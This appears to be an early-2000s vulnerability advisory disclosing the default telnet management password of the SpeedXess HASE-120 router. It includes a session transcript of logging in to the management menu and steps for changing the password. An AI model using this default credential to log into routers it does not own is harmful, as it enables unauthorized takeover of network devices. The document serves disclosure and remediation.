SpeedXess HASE-120(IPOA Router) Default password vulnerability by Secret (sale2001@orgio.net) (WOWHACKER: http://www.wowhacker.com) -=Content=- Too many routers are exposed to default password problem, so I write this for the security of router. This is not for attack but security. I came to know many company use SpeedXess HASE-120 router, but they don't seem to be aware of this problem, or don't care. I happened to connect SpeedXess HASE-120 router one day. SpeedXess Hase-120 may be one of most routers ISPs supply. I could guess the default password easily. But they don't seem to care because the router is not considered as important. If you use default password of SpeedXess Hase-120 router, change it now. [exploit]: The default password is easy for you to guess. Look at the text logo! And guess! The password is "speedxess". telnet Target (target: speedxess hase-120 router address) ##### # # # # ##### ###### ###### ##### # # ###### #### #### # # # # # # # # # # # # ##### # # ##### ##### # # # ##### #### #### # ##### # # # # # # # # # # # # # # # # # # # # # # # ##### # ###### ###### ##### # # ###### #### #### # # # ##### ####### # #### ### # # # # # # # ## # # # # # # # # # # # # # # # ####### # # ##### ###### ##### # #### # # # # ####### # # # # # # # # # # # # # # # # # # # # # ##### ####### ##### ###### ### SpeedXess HASE-120(IPOA Router) Application Start... Welcome to HASE-120(IPOA Router) Management Interface Enter Password: <------ master password input : speedxess HASE-120(I) - Main Menu [S] System [A] Atm interface [D] Dsl interface [E] Ethernet interface [I] IPOA interface [R] Router [X] eXit Enter Selection: X Do you want to exit? (Y)es, (N)o : YESSession End Connection closed by foreign host. [secret@secret:~]$ After connection, we can change the information through system menu including router setting value. [solution]: 1. connect to your router. 2. Put "S" HASE-120(I) - Main Menu [S] System [A] Atm interface [D] Dsl interface [E] Ethernet interface [I] IPOA interface [R] Router [X] eXit Enter Selection: S HASE-120(I) - Main Menu - System Firmware Version HASE-120-1101 System Uptime(YYMMDDhhmmss) ??:??:??:??:??:?? Name of System Owned by Secret Contact Name Secret Secure Lab Location France Ethernet Address 00:00:??:??:??:14 IP Address 211.xxx.xxx.xxx Subnet Mask 255.255.255.xxx [P] Password change [F] Firmware upgrade [S] Setting values [R] Reset system [I] rs-232 Interface [A] ARP table [X] eXit Enter Selection: 3. Put "P" and then change the password. Enter Selection: P Enter New Password (up to 10 characters): Re-enter New Password: Recording Changes. This may take a while...Done Password is changed successfully.